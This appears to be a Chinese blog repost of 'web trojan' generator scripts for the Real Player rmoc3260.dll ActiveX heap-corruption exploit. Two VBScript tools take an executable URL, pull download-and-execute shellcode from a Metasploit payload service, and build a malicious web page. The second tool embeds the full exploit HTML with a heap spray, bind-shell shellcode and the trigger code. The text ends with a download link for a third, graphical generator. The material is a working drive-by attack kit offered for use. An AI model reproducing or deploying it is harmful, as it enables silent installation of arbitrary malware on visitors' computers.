3种版本的Real Player rmoc3260.dll ActiveX Control 网马生成器

夜火最近Real Player rmoc3260.dll ActiveX Control 的漏洞闹的很火，我一直没转相关的文章，今天在鬼仔那看到了相关的网马生成器，有2个网马生成器是lcx那发的，最后一个图形界面的是丰初写的网马生成器（带测试动画）

---------------------lcx那里发的--------------------------------------- 作者：lcx 来源：vbs小铺

代码如下：

‘以下代码保存成vbs，双击即可

1
On Error Resume Next
2
Exeurl = InputBox( "请输入exe的地址：", "输入", "http://www.haiyangtop.net/333.exe" )
3
url = "http://metasploit.com:55555/PAYLOADS?parent=GLOB%280x2b94a2879c50%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL="&URLEncoding(Exeurl)&"&MaxSize=&BadChars=0x00+&ENCODER=Msf%3A%3AEncoder%3A%3AAlpha2&ACTION=Generate+Payload"
4
Body = getHTTPPage(url)
5
Set Re = New RegExp
6
Re.Pattern = "($shellcode =[sS]+</div></pre>)"
7
Set Matches = Re.Execute(Body)
8
If Matches.Count>0 Then Body = Matches(0).value
9
code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"</div></pre>",""),Chr(10),""),".",""))
10

11
function replaceregex(str)
12
set regex=new regExp
13
regex.pattern="\x(..)\x(..)"
14
regex.IgnoreCase=true
15
regex.global=true
62 collapsed lines
16
matches=regex.replace(str,"%u$2$1")
17
replaceregex=matches
18
end Function
19

20
Function getHTTPPage(Path)
21
 t = GetBody(Path)
22
 getHTTPPage = BytesToBstr(t, "GB2312")
23
End Function
24

25
Function GetBody(url)
26
 On Error Resume Next
27
 Set Retrieval = CreateObject("Microsoft.XMLHTTP")
28
 With Retrieval
29
 .Open "Get", url, False, "", ""
30
 .Send
31
 GetBody = .ResponseBody
32
 End With
33
 Set Retrieval = Nothing
34
End Function
35

36
Function BytesToBstr(Body, Cset)
37
 Dim objstream
38
 Set objstream = CreateObject("adodb.stream")
39
 objstream.Type = 1
40
 objstream.Mode = 3
41
 objstream.Open
42
 objstream.Write Body
43
 objstream.Position = 0
44
 objstream.Type = 2
45
 objstream.Charset = Cset
46
 BytesToBstr = objstream.ReadText
47
 objstream.Close
48
 Set objstream = Nothing
49
End Function
50

51
Function URLEncoding(vstrIn)
52
 strReturn = ""
53
 For aaaa = 1 To Len(vstrIn)
54
 ThisChr = Mid(vStrIn,aaaa,1)
55
 If Abs(Asc(ThisChr)) < &HFF Then
56
 strReturn = strReturn & ThisChr
57
 Else
58
 innerCode = Asc(ThisChr)
59
 If innerCode < 0 Then
60
 innerCode = innerCode + &H10000
61
 End If
62
 Hight8 = (innerCode And &HFF00) &HFF
63
 Low8 = innerCode And &HFF
64
 strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)
65
 End If
66
 Next
67
 URLEncoding = strReturn
68
End Function
69

70
set fso=CreateObject("scripting.filesystemobject")
71
set fileS=fso.opentextfile("a.txt",8,true)
72
fileS.writeline replaceregex(code)
73
wscript.echo replaceregex(code)
74
files.close
75
set fso=Nothing
76

77
wscript.echo Chr(13)&"ok，生成a.txt，请用a.txt里的替换http://www.milw0rm.com/exploits/5332里的shellcode1内容即可"

------------------------------------另外一个版本-----------------------------------

1
On Error Resume Next
2
a=""
3
b=""
4
a=a+"<!-- " & vbcrlf
5
a=a+"Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit(Heap Corruption)" & vbcrlf
6
a=a+"written by e.b." & vbcrlf
7
a=a+"Tested on Windows XP SP2(fully patched) English, IE6, rmoc3260.dll version 6.0.10.45" & vbcrlf
8
a=a+"Thanks to h.d.m. and the Metasploit crew" & vbcrlf
9
a=a+"-->" & vbcrlf
10
a=a+"<html>" & vbcrlf
11
a=a+" <head>" & vbcrlf
12
a=a+" <title>Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit</title>" & vbcrlf
13
a=a+" <script language=""JavaScript"" defer>" & vbcrlf
14
a=a+" function Check() {" & vbcrlf
15
a=a+" " & vbcrlf
173 collapsed lines
16
a=a+" " & vbcrlf
17
a=a+"" & vbcrlf
18
a=a+"" & vbcrlf
19
a=a+"// win32_exec - EXITFUNC=seh CMD=c:windowssystem32calc.exe Size=378 Encoder=Alpha2 http://metasploit.com " & vbcrlf
20

21
b=b+"" & vbcrlf
22
b=b+"// win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com " & vbcrlf
23
b=b+"var shellcode2 = unescape(""%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949"" +" & vbcrlf
24
b=b+" ""%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a"" +" & vbcrlf
25
b=b+" ""%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241"" +" & vbcrlf
26
b=b+" ""%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c"" +" & vbcrlf
27
b=b+" ""%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f"" +" & vbcrlf
28
b=b+" ""%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c"" +" & vbcrlf
29
b=b+" ""%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f"" +" & vbcrlf
30
b=b+" ""%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b"" +" & vbcrlf
31
b=b+" ""%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c"" +" & vbcrlf
32
b=b+" ""%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31"" +" & vbcrlf
33
b=b+" ""%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35"" +" & vbcrlf
34
b=b+" ""%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b"" +" & vbcrlf
35
b=b+" ""%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663"" +" & vbcrlf
36
b=b+" ""%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733"" +" & vbcrlf
37
b=b+" ""%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470"" +" & vbcrlf
38
b=b+" ""%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358"" +" & vbcrlf
39
b=b+" ""%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f"" +" & vbcrlf
40
b=b+" ""%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458"" +" & vbcrlf
41
b=b+" ""%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58"" +" & vbcrlf
42
b=b+" ""%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f"" +" & vbcrlf
43
b=b+" ""%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275"" +" & vbcrlf
44
b=b+" ""%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45"" +" & vbcrlf
45
b=b+" ""%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033"" +" & vbcrlf
46
b=b+" ""%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046"" +" & vbcrlf
47
b=b+" ""%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035"" +" & vbcrlf
48
b=b+" ""%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036"" +" & vbcrlf
49
b=b+" ""%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64"" +" & vbcrlf
50
b=b+" ""%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35"" +" & vbcrlf
51
b=b+" ""%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67"" +" & vbcrlf
52
b=b+" ""%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30"" +" & vbcrlf
53
b=b+" ""%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f"" +" & vbcrlf
54
b=b+" ""%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246"" +" & vbcrlf
55
b=b+" ""%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139"" +" & vbcrlf
56
b=b+" ""%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652"" +" & vbcrlf
57
b=b+" ""%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e"" +" & vbcrlf
58
b=b+" ""%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b"" +" & vbcrlf
59
b=b+" ""%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075"" +" & vbcrlf
60
b=b+" ""%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251"" +" & vbcrlf
61
b=b+" ""%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f"" +" & vbcrlf
62
b=b+" ""%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f"" +" & vbcrlf
63
b=b+" ""%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b"" +" & vbcrlf
64
b=b+" ""%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952"" +" & vbcrlf
65
b=b+" ""%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73"" +" & vbcrlf
66
b=b+" ""%u684f%u3956%u386f%u4350"");" & vbcrlf
67
b=b+"" & vbcrlf
68
b=b+"" & vbcrlf
69
b=b+"  var bigblock = unescape(""%u0C0C%u0C0C"");" & vbcrlf
70
b=b+"  var headersize = 20;" & vbcrlf
71
b=b+"  var slackspace = headersize + shellcode1.length;" & vbcrlf
72
b=b+"  while (bigblock.length < slackspace) bigblock += bigblock;" & vbcrlf
73
b=b+"  var fillblock = bigblock.substring(0,slackspace);" & vbcrlf
74
b=b+"  var block = bigblock.substring(0,bigblock.length - slackspace);" & vbcrlf
75
b=b+"  while (block.length + slackspace < 0x40000) block = block + block + fillblock;" & vbcrlf
76
b=b+"" & vbcrlf
77
b=b+"  " & vbcrlf
78
b=b+"" & vbcrlf
79
b=b+"  var memory = new Array();" & vbcrlf
80
b=b+"  for (i = 0; i < 400; i++){ memory[i] = block + shellcode1 }" & vbcrlf
81
b=b+"  " & vbcrlf
82
b=b+"  var buf = '';" & vbcrlf
83
b=b+"  while (buf.length < 32) buf = buf + unescape(""%0C"");" & vbcrlf
84
b=b+"" & vbcrlf
85
b=b+"  var m = '';" & vbcrlf
86
b=b+"" & vbcrlf
87
b=b+"  m = obj.Console;" & vbcrlf
88
b=b+"  obj.Console = buf;" & vbcrlf
89
b=b+"  obj.Console = m;" & vbcrlf
90
b=b+"  " & vbcrlf
91
b=b+"  m = obj.Console;" & vbcrlf
92
b=b+"  obj.Console = buf;" & vbcrlf
93
b=b+"  obj.Console = m;" & vbcrlf
94
b=b+"  " & vbcrlf
95
b=b+"  " & vbcrlf
96
b=b+" } " & vbcrlf
97
b=b+" " & vbcrlf
98
b=b+" </script>" & vbcrlf
99
b=b+" " & vbcrlf
100
b=b+" " & vbcrlf
101
b=b+"</head>" & vbcrlf
102
b=b+" <body onload=""JavaScript: return Check();"">" & vbcrlf
103
b=b+"  <object classid=""clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93"" id=""obj"">" & vbcrlf
104
b=b+"    Unable to create object" & vbcrlf
105
b=b+"  </object>" & vbcrlf
106
b=b+"" & vbcrlf
107
b=b+" </body>" & vbcrlf
108
b=b+"</html>" & vbcrlf
109
b=b+"" & vbcrlf
110
b=b+"# milw0rm.com [2008-04-01]" & vbcrlf
111

112
Exeurl = InputBox( "请输入exe的地址：", "输入", "http://www.haiyangtop.net/333.exe" )
113
url = "http://metasploit.com:55555/PAYLOADS?parent=GLOB%280x2b94a2879c50%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL="&URLEncoding(Exeurl)&"&MaxSize=&BadChars=0x00+&ENCODER=Msf%3A%3AEncoder%3A%3AAlpha2&ACTION=Generate+Payload"
114
Body = getHTTPPage(url)
115
Set Re = New RegExp
116
Re.Pattern = "($shellcode =[sS]+</div></pre>)"
117
Set Matches = Re.Execute(Body)
118
If Matches.Count>0 Then Body = Matches(0).value
119
code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"</div></pre>",""),Chr(10),""),".",""))
120

121
function replaceregex(str)
122
set regex=new regExp
123
regex.pattern="\x(..)\x(..)"
124
regex.IgnoreCase=true
125
regex.global=true
126
matches=regex.replace(str,"%u$2$1")
127
replaceregex=matches
128
end Function
129

130
Function getHTTPPage(Path)
131
 t = GetBody(Path)
132
 getHTTPPage = BytesToBstr(t, "GB2312")
133
End Function
134

135
Function GetBody(url)
136
 On Error Resume Next
137
 Set Retrieval = CreateObject("Microsoft.XMLHTTP")
138
 With Retrieval
139
 .Open "Get", url, False, "", ""
140
 .Send
141
 GetBody = .ResponseBody
142
 End With
143
 Set Retrieval = Nothing
144
End Function
145

146
Function BytesToBstr(Body, Cset)
147
 Dim objstream
148
 Set objstream = CreateObject("adodb.stream")
149
 objstream.Type = 1
150
 objstream.Mode = 3
151
 objstream.Open
152
 objstream.Write Body
153
 objstream.Position = 0
154
 objstream.Type = 2
155
 objstream.Charset = Cset
156
 BytesToBstr = objstream.ReadText
157
 objstream.Close
158
 Set objstream = Nothing
159
End Function
160

161
Function URLEncoding(vstrIn)
162
 strReturn = ""
163
 For aaaa = 1 To Len(vstrIn)
164
 ThisChr = Mid(vStrIn,aaaa,1)
165
 If Abs(Asc(ThisChr)) < &HFF Then
166
 strReturn = strReturn & ThisChr
167
 Else
168
 innerCode = Asc(ThisChr)
169
 If innerCode < 0 Then
170
 innerCode = innerCode + &H10000
171
 End If
172
 Hight8 = (innerCode And &HFF00) &HFF
173
 Low8 = innerCode And &HFF
174
 strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)
175
 End If
176
 Next
177
 URLEncoding = strReturn
178
End Function
179

180
set fso=CreateObject("scripting.filesystemobject")
181
set fileS=fso.opentextfile("a.txt",2,true)
182
fileS.writeline a
183
fileS.writeline "var shellcode1 = unescape(""" & replaceregex(code) & """);"
184
fileS.writeline b
185
files.close
186
set fso=Nothing
187

188
wscript.echo Chr(13)&"ok，生成a.txt"

------------------------------------丰初的图形界面的（带测试动画）-----------------------------------

下载地址